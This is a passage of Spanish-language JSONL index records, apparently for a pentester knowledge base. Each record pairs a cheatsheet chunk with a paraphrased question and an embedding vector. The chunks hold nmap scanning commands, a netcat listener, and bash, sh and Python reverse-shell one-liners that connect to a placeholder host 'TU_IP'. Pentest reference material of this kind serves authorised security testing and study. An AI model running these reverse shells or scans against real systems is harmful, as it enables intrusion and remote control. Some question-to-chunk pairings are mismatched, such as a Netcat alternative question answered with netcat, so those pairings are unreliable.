0.00976, 0.01673, 0.09899, -4e-05, 0.00611, 0.01682, -0.02893, -0.01582, 0.03264, 0.13671, -0.05813, -0.07974, 0.1514, 0.00638, -0.10755, -0.05632, 0.02607, -0.0244, 0.12618, -0.01465, 0.02659, 0.04463, 0.00669, 0.06741, -0.0281, -0.10389, -0.11005, -0.00444, -0.07458, 0.06816, -0.09508, 0.06553, -0.04116, 0.01644, 0.00935, 0.01494, 0.03766, 0.11362, -0.0059, -0.05789, 0.02844, 0.0031, -0.0717, -0.03415, 0.01653, -0.04732, 0.01791, 0.06549, 0.0355, -0.0063, -0.04344, 0.03966, -0.03144, 0.02135, -0.05051, 0.0768, 0.05778, 0.04165, -0.06394, -0.03895, 0.06096, 0.01319, 0.01959, -0.0111, -0.0677, 0.02678, 0.04481, -0.04589, -0.01865, 0.08606, 0.00139, -0.00634, -0.04798, -0.01317, 0.02302, 0.00559, 0.10559, 0.04132, -0.01644, -0.08023, -0.04094, 0.00969, -0.05872, 0.01047, -0.07991, 0.01791, -0.06652, -0.02157, -0.09432, 0.07526, -0.0384, -0.08989, 0.03365, 0.01926, -0.0216, 0.0568, 0.05473, -0.01623, -0.05317, -0.02095, 0.02395, 0.06134, 0.03403, -0.00468, 0.02199, -0.01701, 0.12072, -0.03442, 0.03428, -0.09662, 0.04802, -0.11687, 0.03104, -0.00702, 0.00237, -0.07669, -0.00387, 0.06686, -0.04273, 0.02987, 0.05719, -0.04136, -0.03513, 0.02419, 0.00485, 0.00137, 0.07268, -0.07643, -0.01333, -0.04417, -0.11335, -0.02226, -0.02689, 0.00786, 0.02138, -0.02678, -0.05385, -0.0216, -0.01159, -0.02158, -0.02914, 0.07056, 0.04676, -0.02973, -0.08563, 0.02679, -0.01528, 0.01198, -0.05643, 0.05489, -0.00386, 0.03455, -0.01944, 0.07107, 0.02076, -0.02573, -0.05449, 0.07317, -0.02247, -0.0261, 0.02476, 0.04619, 0.02833, 0.02244, 0.05722, -0.02598, -0.0821, -0.04757, 0.04454, 0.0385, -0.02147, 0.00339, 0.03213, -0.03218, -0.03365, -0.08459, -0.02185, -0.00938, 0.01732, 0.05787, -0.05071, 0.04374, 0.00919, 0.03686, 0.01091, -0.00951]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script vuln IP\n```", "indexar": "que programa hay para ver quΓ© puertos estΓ‘n abiertos en mi red?", "v": [0.10293, 0.09092, -0.07307, -0.02312, 0.06566, 0.00382, 0.15423, -0.11812, -0.07097, -0.20372, -0.12327, -0.04502, 0.0876, -0.11141, 0.07199, -0.03728, -0.01592, 0.02765, 0.14575, 0.03094, -0.07179, -0.00611, -0.046, -0.05021, 0.05948, 0.08964, 0.0964, -0.02136, -0.0532, 0.03303, 0.03315, 0.03799, 0.04948, -0.03568, 0.03399, -0.02701, 0.11951, 0.02553, 0.07058, 0.01739, 0.05035, 0.00903, 0.01125, -0.0519, 0.16942, -0.11296, 0.02014, -0.08512, -0.01211, -0.00634, -0.05381, 0.00605, -0.05181, -0.04762, 0.06188, -0.01095, -0.10181, 0.02279, -0.07119, 0.01964, 0.00319, 0.0847, 0.0291, -0.02592, 0.00641, -0.10226, 0.03748, 0.10327, -0.06615, 0.08594, -0.04537, -0.04809, -0.03864, 0.09291, -0.0277, 0.01348, -0.0443, -0.03295, 0.04103, 0.02673, 0.04022, 0.07746, 0.04461, 0.04715, 9e-05, -0.06542, -0.06345, -0.02801, -0.01953, -0.10781, 0.02856, -0.01677, 0.01801, 0.15996, 0.01199, -0.04182, 0.0353, 0.08077, 0.01022, 0.08554, 0.01823, 0.02149, -0.05964, 0.02081, -0.07935, 0.0607, 0.04762, -0.09596, 0.04927, 0.12016, 0.10992, -0.03955, 0.06806, -0.07173, -0.02806, -0.02685, 0.00308, -0.07666, -0.01066, -0.03821, -0.06582, -0.03671, -0.11035, 0.00379, 0.03839, -0.05691, -0.06007, 0.10259, -0.01181, 0.09659, 0.00781, -0.02906, -0.07068, -0.12435, -0.0643, -0.09097, -0.0039, -0.10992, 0.01498, -0.04536, -0.10804, 0.06648, -0.03917, -0.03476, 0.00659, 0.01193, -0.00061, -0.02403, -0.0709, 0.00572, -0.0303, 0.02843, -0.03924, 0.02288, -0.06018, 0.08871, 0.13217, -0.01379, -0.06351, 0.06333, -0.0568, -0.01176, -0.10597, -0.06683, 0.09025, -0.05322, -0.00721, 0.04597, 0.08361, 0.0436, -0.03381, 0.12522, -0.05982, -0.05711, 0.00066, -0.06292, -0.01603, -0.11398, -0.0276, -0.08088, -0.05069, 0.06662, 0.02397, -0.02744, -0.08641, -0.12252, -0.03066, -0.03773, 0.00905, 0.05175, -0.01037, -0.03296, -0.00227, -0.01507, 0.0102, 0.03427, 0.0024, 0.01828, 0.00407, -0.04447, -0.00542, 0.02008, 0.02582, -0.01846, 0.04639, 0.11058, -0.04663, 0.05055, 0.0266, 0.17236, -0.00537, -0.01196, 0.04327, 0.01541, -0.05778, 0.03531, -0.00206, 0.08836, 0.10688, 0.05917, 0.02269, 0.00878, -0.029, 0.06143, -0.02447, -0.04355, 0.03272, 0.01565, 0.05134, 0.06663, 0.0411, -0.0664, -0.07397, -0.04232, -0.03822, -0.00326, -0.00062, 0.02382, 0.01112, -0.06841, 0.01081, 0.05593, -0.00541, -0.09714, 0.06216, -0.02579, -0.04891, 0.04285, 0.02697, -0.01731, -0.09781, 0.06846, -0.0282, -0.10082, 0.0437, 0.0087]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script vuln IP\n```", "indexar": "con quΓ© puedo escanear todos los dispositivos activos sin usar puertos?", "v": [0.09325, 0.02195, -0.17654, -0.05955, 0.09214, -0.06479, 0.07027, -0.18173, -0.13509, -0.01024, -0.15579, 0.00376, -0.04849, 0.0543, 0.03717, -0.10795, 0.05189, -0.06824, 0.03771, 0.02624, -0.03777, -0.06214, -0.08256, 0.01276, 0.00022, 0.14762, 0.0694, 0.04299, -0.15838, -0.02919, -0.04991, 0.10214, 0.19137, -0.02869, -0.02032, -0.14103, -0.01795, -0.00464, 0.094, 0.1143, 0.02251, 0.00021, -0.08857, -0.0869, 0.10114, 0.02632, -0.09329, -0.05111, -0.06248, 0.04853, -0.07152, 0.03565, -0.1256, 0.05083, -0.06157, -0.04681, 0.11487, -0.01192, 0.06245, -0.1207, -0.09352, 0.08663, 0.02727, -0.0413, -0.00129, -0.07162, 0.01028, 0.10607, -0.09202, 0.02619, -0.00166, 0.0292, 0.04107, 0.11002, 0.07291, 0.04438, -0.0156, -0.03814, -0.01489, 0.18685, 0.0167, -0.04699, -0.01244, -0.06333, -0.00932, -0.06809, -0.00956, -0.0361, 0.0414, -0.13533, 0.03638, -0.04546, 0.0001, 0.03843, -0.0831, 0.02792, -0.02648, 0.10182, 0.00617, -0.00237, 0.10358, 0.03812, -0.06572, 0.08583, 0.0097, -0.00611, 0.04095, -0.07797, 0.07552, -0.0493, 0.02434, -0.03302, -0.01806, -0.06739, -0.06138, 0.12727, -0.04579, -0.14883, -0.02993, 0.0393, 0.00131, -0.08643, 0.05356, -0.0352, 0.11909, 0.021, 0.05353, 0.06518, 0.04341, 0.04325, 0.0414, -0.07785, 0.01462, -0.07773, -0.10506, -0.08069, -0.00847, -0.04861, -0.03712, -0.02005, 0.02038, 0.06685, -0.06887, -0.01159, 0.04904, 0.01413, 0.06125, -0.00705, -0.03617, -0.04759, 0.08901, -0.00672, -0.09467, 0.01846, -0.05221, 0.07198, 0.13054, -0.03981, -0.0609, 0.07313, -0.09254, 0.00462, -0.04076, 0.04728, -0.03097, -0.06754, -0.03248, 0.00291, -0.02787, 0.0069, 0.00161, 0.10457, -0.01143, -0.088, 0.08021, 0.00615, -0.00297, 0.03034, -0.00051, -0.05468, -0.05281, 0.05021, -0.01238, -0.04878, -0.00419, -0.03543, -0.01072, -0.05182, -0.03093, 0.07474, 0.00385, 0.08588, 0.0149, 0.0242, 0.02612, -0.01269, -0.03773, 0.00205, 0.02922, -0.03287, 0.04627, 0.01569, 0.04761, -0.04908, 0.1091, 0.03488, -0.09166, 0.04045, 0.02469, 0.04115, -0.00353, -0.02439, 0.08787, 0.01579, -0.02725, 0.01884, -0.01755, 0.09234, -0.02379, 0.0057, 0.00368, 0.05594, -0.01228, 0.02261, 0.02729, 0.06574, 0.00992, 0.03286, 0.01226, -0.01109, 0.01943, -0.01383, -0.07701, -0.01092, -0.00358, 0.03436, 0.01627, -0.00295, 0.00102, 0.02065, -0.01268, 0.01554, 0.03855, -0.0082, -0.02242, -0.00019, -0.03266, 0.01908, -0.04046, -0.06107, 0.01013, 0.0593, 0.06292, -0.04526, 0.01608, 0.02873]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script vuln IP\n```", "indexar": "cual es una herramienta libre para detectar vulnerabilidades y versiones de servicios?", "v": [0.06339, 0.04773, -0.14627, -0.1868, -0.01115, -0.08474, -0.09958, -0.06038, -0.0176, -0.07869, -0.03471, -0.1627, -0.13695, -0.04997, 0.09629, 0.05691, 0.0591, -0.2193, 0.05738, -0.00804, -0.0447, -0.0432, -0.08043, -0.07099, -0.14123, 0.01216, 0.02854, -0.07959, -0.09204, 0.01578, -0.00707, -0.1014, 0.04831, -0.01352, -0.08973, 0.02598, -0.00461, 0.01015, 0.04999, 0.07532, 0.10938, 0.00392, 0.00074, 0.07232, 0.10068, -0.07052, -0.06532, -0.01733, 0.06535, 0.09066, -0.03565, -0.09334, -0.19583, -0.01635, 0.00173, -0.12733, 0.1976, -0.07974, 0.03933, -0.07877, -0.13489, 0.07488, 0.00854, -0.0315, 0.04891, -0.11593, -0.01666, -0.02187, -0.10237, 0.10352, 0.04333, -0.01773, 0.06917, 0.03977, -0.0643, 0.01073, -0.03284, -0.00853, 0.00573, 0.00983, 0.04575, 0.02271, -0.02567, 0.09378, -0.12745, -0.1058, 0.1017, -0.02722, 0.09003, -0.07331, 0.10227, 0.0909, -0.07217, 0.04268, -0.00947, -0.05762, 0.14695, -0.01899, -0.02346, -0.00328, 0.08358, -0.04278, -0.0749, 0.08265, -0.01564, 0.02448, -0.03625, 0.01681, -0.07515, -0.06425, 0.01168, -0.01172, -0.00503, -0.00861, -0.01157, 0.05719, 0.01822, 0.00965, 0.0331, -0.0039, 0.00609, -0.03316, -0.07465, -0.06392, 0.03927, -0.01231, -0.02019, 0.05707, -0.03799, -0.08229, 0.05228, -0.05732, -0.09251, -0.01583, -0.01984, 0.04545, 0.06018, -0.13665, -0.05424, -0.00786, -0.00103, 0.03145, 0.01687, -0.00073, 0.04886, 0.04397, 0.00633, -0.02994, -0.04613, 0.0242, 0.01283, -0.00373, -0.04869, 0.05816, -0.04217, -0.02842, -0.05976, -0.01935, -0.08498, 0.06564, 0.00701, 0.01339, 0.05839, 0.00979, 0.02002, -0.00793, 0.10003, 0.04848, 0.09813, 0.03311, 0.0072, 0.02526, 0.11608, -0.04082, 0.01299, -0.08813, -0.01567, -0.03434, 0.01876, -0.08872, -0.01241, -0.02533, -0.04742, -0.04663, -0.00023, -0.01922, 0.01213, -0.0269, 0.04727, -0.01049, -0.00016, -0.01694, -0.0362, -0.02949, 0.09691, 0.02708, -0.00864, -0.05741, 0.01039, -0.03751, -0.14446, -0.04908, -0.06705, -0.01725, 0.00841, 0.06753, 0.02087, 0.00299, 0.01708, 0.05924, 0.02188, 0.04171, 0.04786, -0.04337, -0.0597, -0.04645, -0.01119, 0.0236, 0.00365, -0.01871, 0.0009, -0.01826, 0.05269, 0.00494, -0.00708, 0.00343, 0.02119, 0.0023, 0.03985, -0.0011, 0.05397, -0.015, -0.03261, -0.03602, 0.02242, -0.08234, 0.06457, 0.01148, -0.03251, -0.07114, 0.0251, 0.07078, 0.0244, -0.07227, -0.01547, -0.0452, 0.00531, -0.03808, -0.02708, -0.07041, -0.07575, 0.05902, 0.06265, -0.10313, 0.00912, -0.05789]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "que programa puedo usar para escuchar mensajes de red en tiempo real", "v": [-0.00177, 0.20977, -0.12026, -0.13894, -0.01127, -0.07255, -0.15268, -0.0287, 0.07829, -0.1189, -0.09936, -0.07845, 0.0245, -0.06106, 0.00976, 0.05509, 0.06667, 0.1126, 0.0457, -0.03432, 0.13265, -0.04874, -0.17311, 0.0332, 0.02008, 0.09825, 0.11002, -0.04768, 0.02384, 0.03559, 0.0525, -0.01373, 0.08481, -0.10571, -0.08709, 0.02719, 0.10598, 0.12975, -0.01048, 0.10372, 0.08363, 0.07809, -0.08476, -0.02335, 0.07518, -0.01746, 0.03999, 0.0221, -0.07542, -0.00614, -0.04986, -0.02355, -0.07193, 0.00912, -0.00865, -0.11513, 0.1194, -0.10956, -0.05446, -0.06926, -0.06365, -0.00581, 0.0259, 0.00194, 0.05638, -0.021, 0.12047, 0.0256, -0.10964, 0.06666, -0.07701, 0.00877, -0.00791, 0.06274, 0.07595, 0.05874, -0.10821, -0.04955, 0.00524, 0.00086, -0.01629, -0.06377, 0.02525, 0.0735, -0.06935, -0.01608, 0.10981, -0.09161, -0.05629, -0.05727, -0.03142, 0.06867, 0.05484, 0.05892, 0.10312, -0.03617, -0.00244, -0.02923, 0.02178, 0.05397, 0.08115, -0.03328, -0.02094, 0.01469, 0.01295, 0.04773, 0.09368, -0.10137, 0.0904, 0.01603, -0.04274, -0.09983, 0.00296, -0.05311, -0.00668, -0.07165, 0.01606, -0.06203, 0.02828, -0.02235, -0.06398, 0.07557, -0.02486, 0.01974, 0.05618, -0.04217, -0.02671, -0.05296, -0.02291, 0.05974, -0.0761, -0.02925, -0.02168, -0.16333, -0.06406, -0.04669, -0.0784, 0.01749, 0.00758, -0.01961, 0.01761, 0.12105, -0.11339, -0.05005, -0.01496, 0.04371, -0.08733, -0.11348, -0.01645, 0.00874, 0.12815, 0.01392, -0.02538, -0.00265, -0.01858, -0.04357, 0.06545, -0.00622, -0.0529, 0.02413, -0.06854, 0.01173, -0.0512, -0.03891, 0.08067, -0.08723, 0.02294, 0.08847, 0.09481, 0.01819, -0.03458, 0.04394, 0.093, -0.08207, -0.09752, -0.05715, -0.00247, -0.05343, 0.00198, -0.11892, -0.05661, 0.02941, -0.01813, -0.0304, 0.03121, -0.0233, -0.0379, 0.0312, -0.01108, 0.0264, -0.02871, -0.01349, 0.04209, 0.07437, 0.00651, 0.02337, -0.00133, -0.0255, -0.03763, -0.06099, -0.08302, -0.03507, -0.00555, -0.04658, 0.03202, 0.05562, -0.06449, 0.03783, 0.01516, 0.1182, 0.05181, -0.058, 0.05586, 0.01431, -0.06359, -0.0225, 0.0397, -0.00616, 0.01741, 0.02607, 0.04356, 0.04248, 0.03026, 0.02813, -0.06908, -0.00995, 0.01552, 0.04993, 0.0347, 0.04934, -0.03496, 0.04792, -0.02297, 0.02554, 0.0197, -0.02422, 0.01812, 0.02353, -0.04988, -0.10141, 4e-05, 0.08451, 0.00694, 0.01646, 0.01348, -0.01799, -0.07304, 0.02919, -0.02244, -0.02269, -0.04706, 0.04181, 0.04946, -0.06934, 0.08332, -0.00924]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "como escucho el trΓ‘fico de una direcciΓ³n IP especΓ­fica", "v": [-0.1349, -0.0857, -0.15609, -0.13004, 0.02097, -0.21141, 0.0424, -0.052, 0.01056, 0.04886, 0.13424, -0.07125, 0.00864, -0.09024, 0.02444, -0.06017, 0.09778, -0.03505, 0.09013, -0.1682, -0.06521, 0.09661, -0.08839, 0.06675, -0.01283, -0.01353, -0.18169, 0.08143, -0.10099, -0.05482, -0.0948, 0.01505, 0.09005, -0.03275, -0.05663, -0.07749, 0.0673, 0.08549, -0.00113, -0.00236, -0.00636, -0.08068, -0.1102, -0.0585, 0.07134, -0.02534, 0.01993, -0.04189, -0.0694, -0.10659, -0.04341, -0.11566, -0.04343, -0.09032, -0.11735, 0.10853, 0.03338, -0.00816, -0.01171, 0.04279, 0.08152, 0.10473, -0.04632, 0.01762, 0.03547, -0.12978, -0.00748, 0.03772, -0.06055, -0.16143, 0.06904, 0.0186, 0.00191, 0.19023, 0.11968, -0.02196, 0.02614, 0.08658, 0.07644, 0.03489, 0.10384, 0.11545, -0.12601, -0.03917, -0.07259, -0.04279, 0.02579, -0.14157, 0.07599, 0.00795, -0.04888, 0.06837, -0.00903, 0.01788, 0.03567, 0.08176, -0.08607, 0.0035, 0.00918, -0.0271, 0.03412, 0.09266, -0.11781, 0.05248, 0.10801, 0.12687, 0.05691, -0.06363, 0.08801, 0.09712, -0.11467, 0.02364, 0.05835, -0.09078, 0.06041, -0.04768, -0.00797, -0.03847, 0.0116, -0.03305, -0.05429, -0.04022, 0.01776, 0.03793, -0.01854, 0.07787, -0.01248, 0.12088, 0.05082, -0.01086, 0.01463, 0.00927, -0.08778, -0.02446, 0.02464, 0.03766, -0.07149, 0.03007, 0.00112, 0.06212, 0.09616, -0.09959, 0.03031, -0.02649, 0.04945, -0.0624, -0.04322, -0.09238, -0.01237, -0.03241, 0.00773, -0.03084, 0.03825, -0.0159, 0.01129, 0.12625, 0.00397, -0.05708, 0.02175, 0.02918, -0.00949, 0.04195, 0.0023, 0.02301, 0.05174, 0.06717, -0.08916, 0.0373, 0.06229, -0.01215, -0.05879, -0.04667, 0.01407, -0.03064, -0.08743, -0.04193, -0.03243, -0.0194, 0.01463, 0.04249, -0.0164, -0.10641, -0.04793, 0.02478, 0.03492, -0.01322, 0.01808, 0.02753, -0.02217, -0.01183, 0.03285, 0.03678, -0.00233, 0.00653, -0.05027, -0.02438, -0.00612, -0.04976, -0.02649, -0.02317, -0.00367, -0.01665, 0.04811, -0.00819, -0.00992, -0.03145, -0.00788, 0.00502, 0.01145, 0.02132, -0.00918, -0.04076, 0.02413, -0.02354, -0.03523, 0.00355, 0.02808, -0.02448, 0.03227, 0.02997, -0.02041, 0.02709, -0.0455, -0.04332, -0.03702, -0.00847, -0.00758, 0.01397, 0.01919, 0.00558, -0.03328, 0.05839, -0.03192, -0.02727, 0.0453, 0.0032, -0.03472, -0.01613, -0.0302, -0.01504, 0.02824, -0.01133, -0.00807, -0.06014, -0.02513, -0.01923, -0.07133, 0.03626, -0.00471, -0.03642, -0.01144, 0.03779, -0.00616, 0.00038, 0.0052, -0.00674]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "indexar": "cual es una alternativa libre al programa Netcat", "v": [-0.14521, 0.01487, 0.01728, -0.06612, -0.02959, -0.05154, -0.0522, -0.05327, -0.18809, -0.01841, -0.04133, -0.19315, -0.05512, 0.01107, 0.02161, 0.04584, 0.01629, -0.13061, 0.20172, 0.01479, -0.10978, -0.01719, -0.01639, -0.12638, -0.02676, 0.01879, 0.01275, 0.10894, 0.01157, 0.08014, -0.02478, -0.01845, 0.01029, -0.00331, 0.05192, 0.00975, 0.19873, 0.02453, 0.1065, -0.08864, 0.05493, -0.01506, -0.07657, 0.1441, 0.07396, -0.03435, -0.0725, -0.05043, 0.01499, -0.04978, -0.02656, -0.00521, -0.01287, 0.02828, 0.09691, -0.0613, 0.06404, -0.13341, -0.10623, 0.00846, -0.05272, -0.01969, 0.07299, -0.14024, 0.02726, 0.03352, 0.0368, 0.03158, -0.09467, 0.11084, 0.11496, 0.00568, 0.05455, -0.04069, -0.13855, 0.06827, -0.08491, -0.00642, 0.00436, 0.00627, 0.00249, -0.06326, 0.06788, 0.1115, -0.09066, -0.04247, 0.07301, -0.08416, -0.01931, 0.01186, 0.05023, 0.07507, 0.01129, 0.14605, 0.04313, -0.11649, 0.10857, 0.07096, 0.03988, 0.04877, 0.02594, 0.04905, -0.14214, 0.01769, -0.0482, 0.01446, 0.01905, 0.0233, -0.13549, 0.0448, 0.01856, 0.0347, -0.00887, 0.00681, -0.0265, -0.07814, 0.00723, 0.00805, 0.066, -0.04807, -0.07288, 0.05789, -0.05913, -0.04171, 0.12205, 0.04198, 0.03897, 0.08813, -0.0727, 0.07647, 0.03455, 0.00027, -0.05125, -0.12071, -0.10964, -0.11653, 0.03792, -0.02059, 0.0512, -0.00359, 0.02001, 0.00735, -0.00059, 0.03367, 0.04053, -0.03424, -0.00256, -0.06225, -0.00217, -0.00633, -0.04254, 0.07205, -0.02824, 0.10814, -0.0756, -0.00773, -0.07612, 0.02389, -0.07288, 0.06591, 0.03133, -0.0565, 0.01215, -0.04208, 0.00118, -0.00473, -0.03449, 0.00476, -0.0085, 0.05172, -0.01469, 0.13015, 0.05556, -0.07827, 0.00071, -0.06028, 0.00944, -0.09257, 0.04729, -0.03687, -0.0608, 0.05974, -0.00068, -0.0228, -0.02301, -0.03514, -0.03625, 0.04965, 0.00098, 0.01782, -0.0845, -0.00337, -0.10572, -0.05769, 0.02249, 0.01364, -0.001, -0.07208, 0.03269, -0.00663, -0.08624, -0.03697, 0.02617, -0.03062, -0.02276, 0.0592, 0.02176, -0.01035, 0.04589, 0.12214, 0.02333, -0.0281, 0.07283, 0.03096, -0.04665, -0.03111, 0.00513, 0.00539, 0.02441, 0.04008, 0.00284, -0.02656, -0.0086, 0.08843, 0.00226, -0.02546, 0.03243, 0.0492, -0.03431, 0.0105, 0.00113, -0.08416, 0.01644, -0.0243, -0.00739, -0.05016, -0.01334, 0.00442, -0.00283, -0.03549, 0.00207, 0.08795, -0.03525, -0.04086, 0.00776, 0.02292, -0.07072, -0.01909, -0.00868, 0.00247, -0.05817, 0.06011, 0.01802, -0.01396, 0.02467, 0.0704]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "que programa hay para montar una shell remota en Linux?", "v": [0.02202, -0.04176, -0.14406, -0.17567, -0.09067, -0.11249, -0.15557, 0.07596, -0.0945, 0.01139, -0.00319, -0.02755, 0.17222, -0.1092, 0.09582, -0.00798, -0.12293, -0.12042, 0.00617, -0.07529, -0.09332, 0.07688, -0.08054, -0.02071, 0.03097, 0.03013, 0.11388, -0.08722, 0.06415, 0.00609, -0.00993, 0.00921, 0.04113, 0.02647, -0.03846, 0.04237, 0.07776, -0.06179, 0.11827, 0.08018, 0.07621, -0.0498, -0.01631, 0.06329, 0.01419, -0.12987, 0.1174, -0.09759, 0.0583, -0.09757, 0.08947, 0.02196, -0.03532, 0.00628, 0.11882, -0.01313, 0.12323, -0.14448, 0.05912, 0.01225, -0.12142, 0.04193, 0.00686, -0.01283, 0.05033, 0.00311, -0.04658, -0.06522, -0.16941, -0.001, -0.00598, -0.00245, 0.00248, 0.00758, -0.04525, 0.05529, -0.1082, 0.012, 0.05903, -0.04225, -0.02085, -0.05336, 0.06278, 0.12152, -0.12877, -0.17291, 0.03387, 0.00719, -0.04267, 0.06119, 0.0328, 0.0709, 0.03241, 0.12634, 0.10558, -0.05313, 0.14353, 0.12505, -0.00437, -0.01696, -0.09989, 0.02262, -0.05749, 0.16401, -0.01208, 0.04167, 0.06984, -0.02406, 0.01152, 0.05203, 0.06736, -0.01893, -0.01363, 0.00602, -0.12585, -0.08167, -0.03109, 0.01009, 0.03031, -0.02669, -0.05323, 0.07025, -0.04641, 0.04403, 0.03417, -0.01889, -0.03878, 0.16662, -0.04497, -0.01486, 0.04869, -0.07576, 0.00247, 0.02791, -0.05828, 0.04363, 0.00787, -0.10396, -0.01555, -0.04703, 0.02065, 0.03694, -0.00975, 0.03047, 0.1039, 0.0067, 0.02151, -0.07686, -0.00485, -0.01499, 0.02034, 0.06487, 0.01994, 0.01185, -0.12619, -0.06549, 0.03128, 0.01974, -0.03119, 0.0006, -0.01689, -0.04628, -0.00123, -0.04713, -0.00784, -0.05159, -0.011, 0.05115, 0.04827, 0.05181, -0.03393, 0.10692, 0.0526, -0.02786, 0.02848, -0.02994, 0.06153, -0.08796, -0.00858, -0.00229, -0.04385, 0.04435, 0.0662, -0.0374, 0.02272, 0.03327, -0.0254, 0.06902, -0.01374, 0.00028, 0.03959, -0.00679, -0.0204, 0.00835, -0.001, 0.0271, -0.03678, -0.01481, 0.04517, 0.0223, -0.0838, 0.01788, 0.02187, -0.02762, 0.04224, 0.01481, -0.0382, 0.02255, 0.03775, 0.07491, 0.01651, -0.0033, 0.01251, 0.00885, 0.02273, -0.001, 0.02315, 0.04059, 0.04087, 0.06225, -0.01733, -0.00644, 0.07962, 0.03952, -0.01319, -0.05226, 0.03243, 0.03121, 0.01846, -0.02776, 0.02426, -0.06005, 0.01682, -0.00182, -0.0314, -0.02473, 0.01746, 0.00019, 0.02373, -0.03236, -0.0584, 0.10532, 0.00458, -0.08268, -0.05892, -0.02323, -0.05554, 0.02096, -0.02363, -0.01767, -0.07732, -0.00039, -0.01041, -0.03496, -0.03171, 0.03422]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "con que puedo hacer un reverse shell desde bash?", "v": [0.05536, 0.00991, -0.02527, 0.09148, -0.10454, -0.00295, -0.1227, -0.06613, 0.00922, 0.02667, -0.15928, 0.04167, 0.03306, -0.04377, 0.01894, 0.08414, -0.19532, 0.0613, 0.0136, -0.01565, 0.08429, -0.05156, -0.0708, -0.00938, -0.00443, 0.05214, -0.0182, 0.10492, -0.1134, -0.06933, -0.12503, -0.184, 0.04741, 0.01759, 0.00052, 0.13457, 0.00128, 0.00929, 0.05166, 0.1041, -0.0776, 0.01827, -0.09562, 0.15642, 0.14233, -0.07958, 0.01488, -0.03073, 0.00683, -0.06862, -0.08998, -0.16845, -0.21985, 0.09608, 0.05541, -0.03651, 0.12129, -0.16162, -0.02113, -0.0947, -0.11685, 0.05712, -0.01877, 0.10152, 0.06662, 0.02779, -0.07786, -0.14336, -0.05225, 0.03069, -0.03787, 0.03561, -0.04133, 0.05089, -0.1033, 0.0004, 0.01019, 0.01914, -0.02271, 0.02037, -0.17457, -0.07196, 0.00651, 0.07408, 0.04866, -0.08189, -0.09019, -0.05131, 0.04318, 0.02848, 0.00727, 0.05804, 0.01164, 0.04594, -0.01997, -0.07052, -0.03876, 0.03873, -0.16204, 0.00597, -0.02456, -0.02918, 0.01578, 0.12755, 0.06236, -0.03472, -0.02283, 0.03923, -0.01228, 0.14776, 0.02525, -0.07699, 0.03291, -0.00333, -0.02311, -0.02571, -0.10214, -0.01469, 0.03391, 0.02986, 0.02939, -0.06259, -0.04274, 0.01904, -0.00257, 0.0147, -0.03729, 0.12101, -0.02443, 0.01478, 0.04603, 0.026, 0.06824, -0.0179, -0.02953, 0.10354, 0.02218, -0.01046, -0.0041, -0.03812, 0.01737, 0.15261, -0.02778, -0.01163, 0.00605, -0.08019, 0.0147, -0.11022, -0.08007, -0.04138, 0.01607, 0.07575, 0.00871, 0.02902, -0.03914, -0.01443, 0.04621, -0.02267, 0.02111, -0.03324, -0.03014, 0.04107, -0.03696, 0.06946, 0.02746, 0.00957, -0.09568, 0.00382, -0.01445, 0.05951, -0.07168, 0.0386, 0.06429, -0.00185, 0.07739, 0.02663, 0.01423, 0.00356, 0.02275, -0.03172, 0.09417, -0.02248, -0.03389, -0.07066, 0.03156, 